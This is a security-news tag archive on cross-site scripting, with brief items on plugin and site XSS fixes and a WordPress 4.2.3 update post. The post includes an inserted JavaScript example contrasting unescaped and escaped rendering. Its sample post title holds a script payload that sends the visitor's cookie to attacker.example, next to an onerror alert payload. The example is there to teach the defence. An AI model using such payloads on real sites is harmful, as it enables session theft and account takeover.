Developers at Automattic fixed a stored cross-site scripting error this week in Akismet, the anti-spam plugin that figures into millions of WordPress websites.
Tag Archives: XSS
WordPress Jetpack Plugin Patched Against Stored XSS Vulnerability
The popular Jetpack WordPress plugin was updated this week in order to patch a critical stored cross-site scripting vulnerability.
New Attacks Recall Old Problems with Browser Cookies
DHS CERT published an alert prompted by a paper delivered at USENIX regarding the security of browser cookies.
eBay Fixes XSS Flaw in Subdomain
There was a cross-site scripting vulnerability in an eBay domain that could have allowed an attacker to steal users’ session cookies and take over their accounts. The company has removed the vulnerable page, according to the researcher who discovered the bug and disclosed it to eBay, Aditya Sood. The vulnerability existed on an eBay subdomain, […]
Netflix Sleepy Puppy Awakens XSS Vulnerabilities in Secondary Applications
Netflix released Sleepy Puppy, a cross-site scripting payload management framework, to open source. The tool finds XSS vulnerabilities in secondary applications.
Salesforce Patches XSS on a Subdomain
Salesforce.com patched a cross-site scripting vulnerability on one of its domains that could have led to phishing attacks.
Vulnerabilities Identified in Several WordPress Plugins
Researchers have identified a handful of vulnerabilities present in three different plugins used by the content management system WordPress.
PHP File Manager Riddled With Vulnerabilities, Including Backdoor
Multiple critical vulnerabilities have existed, some for nearly five years, in PHP File Manager, a web-based file manager used by several high profile corporations.
XSS Vulnerability In WordPress – Update Now
The WordPress team just released version 4.2.3 of their software, which is mostly a security update. They “strongly encourage you to update your sites immediately.” To do so, visit your Dashboard, click ‘Updates’ and then ‘Update Now’. You only need to do this manually if, for whatever reason, you have disabled automatic background updates; otherwise your site will pick up the release on its own.
According to their blog entry, the newest version contains fixes for 20 bugs from 4.2. The page also says: “WordPress versions 4.2.2 and earlier are affected by a cross-site scripting vulnerability, which could allow users with the Contributor or Author role to compromise a site. This was initially reported by Jon Cave and fixed by Robert Chapin, both of the WordPress security team, and later reported by Jouko Pynnönen.
We also fixed an issue where it was possible for a user with Subscriber permissions to create a draft through Quick Draft. Reported by Netanel Rubin from Check Point Software Technologies.”
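The quote above describes the bug class without showing it: content submitted by a low-privilege account (Contributor or Author) is stored and later rendered to every visitor and administrator who opens the page, so a script smuggled into that content runs in their browser. The following is an added example, not WordPress code and not from the Avira post. It uses a constructed sample post and a toy page template to contrast rendering without output encoding against rendering with HTML escaping, and adds the cookie attribute that blunts the cookie-theft payload. The payload is illustrative; the trigger of the real 4.2.3 bug is not described on this page and is not reproduced here.

```javascript
// Added example (not WordPress code): storing a contributor's post and
// rendering it into a page, first without output encoding (stored XSS),
// then with every stored field HTML-escaped at output time.

// Constructed sample post, as a Contributor might submit it. Illustrative
// payload only; not the trigger of the actual WordPress 4.2.3 issue.
const contributorPost = {
  author: 'contributor1',
  title: 'Weekend reading <script>document.location="https://attacker.example/?c="+document.cookie</script>',
  body: '<img src=x onerror="alert(document.cookie)">',
};

// Minimal HTML escaper covering the five characters that let text break
// out of an element body or a quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: stored fields are interpolated straight into the template,
// so whoever opens the page (admin included) runs the author's script.
function renderPostUnsafe(post) {
  return `<article>
  <h2>${post.title}</h2>
  <p class="byline">by ${post.author}</p>
  <div class="body">${post.body}</div>
</article>`;
}

// Hardened: every stored field is encoded for an HTML element body.
function renderPostSafe(post) {
  return `<article>
  <h2>${escapeHtml(post.title)}</h2>
  <p class="byline">by ${escapeHtml(post.author)}</p>
  <div class="body">${escapeHtml(post.body)}</div>
</article>`;
}

// Check used here to compare the two renderings: list every tag name in
// the output that the template itself did not emit. Anything extra came
// from the stored post and would be parsed as markup by the browser.
const TEMPLATE_TAGS = new Set(['article', 'h2', 'p', 'div']);
function foreignTags(html) {
  const seen = new Set();
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)) {
    const tag = m[1].toLowerCase();
    if (!TEMPLATE_TAGS.has(tag)) seen.add(tag);
  }
  return [...seen];
}

// A session cookie issued with HttpOnly is invisible to document.cookie,
// so the cookie-exfiltration payload above gets nothing even if some
// other XSS slips past the output encoding.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

console.log('unsafe rendering leaks tags:', foreignTags(renderPostUnsafe(contributorPost)));
console.log('safe rendering leaks tags:  ', foreignTags(renderPostSafe(contributorPost)));
console.log('Set-Cookie:', sessionCookieHeader('constructed-session-id'));
```

Escaping everything is the right default for a toy template, but a blogging platform has to let authors write HTML. WordPress itself handles that by withholding the `unfiltered_html` capability from Contributors and Authors and passing their content through its KSES allow-list filter, so an escalation from those roles usually means a bypass of that filter rather than raw injection; that is why a fix in the core parser, rather than in a theme, is what a release like 4.2.3 carries.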
And don’t forget: WordPress is one of the most popular content management systems and blogging platforms, and that huge user base makes it an attractive target for cybercriminals. Administrators should keep their WordPress installations, including plugins and themes, up to date and apply security updates as soon as they become available.
If you want to find out more about the dangers you face as a blog administrator, and get some advice on protecting your site, take a look at Ange Albertini’s blog article on the topic.
The post XSS Vulnerability In WordPress – Update Now appeared first on Avira Blog.
Several Critical Flaws Patched in Drupal Module
There are several critical vulnerabilities in a middleware layer used in Drupal, including both cross-site scripting and cross-site request forgery bugs, that can be exploited remotely. The vulnerabilities are in the Open Semantic Framework, which is a third-party project and not part of the Drupal Core. The framework is used to allow “structured data (RDF) […]